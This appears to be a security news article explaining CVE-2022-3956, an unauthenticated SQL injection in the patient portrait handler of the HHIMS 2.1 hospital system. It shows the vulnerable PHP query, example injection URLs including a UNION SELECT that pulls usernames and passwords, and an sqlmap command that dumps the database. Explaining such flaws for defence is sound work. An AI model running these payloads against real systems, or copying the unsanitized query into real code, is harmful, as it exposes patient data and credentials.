CVE CyberSecurity Database News

CVE-2022-3956 - Critical SQL Injection in tsruban HHIMS 2.1 Patient Portrait Handler (VDB-213462) – What You Need to Know

Poster -

---

Introduction

A dangerous flaw, tracked as CVE-2022-3956, was discovered in tsruban HHIMS 2.1, a healthcare management system. This vulnerability, marked as critical, centers on the Patient Portrait Handler and allows attackers to exploit the PID argument. If left unpatched, it exposes sensitive patient data and the underlying database to remote attacks.

What’s tsruban HHIMS 2.1?

HHIMS stands for *Hospital Health Information Management System* and is widely used in healthcare providers for patient management. The flaw is inside a function that handles displaying patient portrait photos when given a PID (Patient ID).

Vulnerability Details

- CVE ID: CVE-2022-3956

How the Vulnerability Occurs

When the PID parameter in the handler is not properly sanitized, attackers can inject harmful SQL code and control the underlying database.

A vulnerable PHP code snippet might look like this

<?php
$pid = $_GET['PID'];
$query = "SELECT photo FROM patients WHERE id = $pid";
$result = mysqli_query($conn, $query);

// Renders the image ...
?>

Here, $_GET['PID'] comes *directly* from the URL and gets used in an SQL statement without validation or prepared statements. An attacker can craft the PID parameter to inject any SQL commands – leading to data theft, modification, or even taking control of the server.

`

https://hospital.example.com/hhims/patient-portrait.php?PID=1

`

https://hospital.example.com/hhims/patient-portrait.php?PID=1 OR 1=1

`

https://hospital.example.com/hhims/patient-portrait.php?PID=1 UNION SELECT username, password FROM users--

sqlmap -u "https://hospital.example.com/hhims/patient-portrait.php?PID=1" --risk=3 --level=5 --dump


This command will attempt to exploit the vulnerability, enumerate available data, and dump it.

Leak of patient records

- Compromise of user/admin accounts

Check for patches or updates from tsruban’s developers.

Vulnerability Database Entry (VDB-213462)

References

- National Vulnerability Database: CVE-2022-3956
- VulDB Entry: VDB-213462
- Common Techniques for SQL Injection Prevention (OWASP)

Summary

A critical SQL injection flaw, CVE-2022-3956, in tsruban HHIMS 2.1’s Patient Portrait Handler puts sensitive healthcare data and server security at risk. Remote attackers do not need login credentials to exploit this. The fastest way to stay safe is to patch your system, check your codebase for any unsanitized SQL input, and always follow security best practices.

Timeline

Published on: 11/11/2022 16:15:00 UTC
Last modified on: 11/16/2022 15:46:00 UTC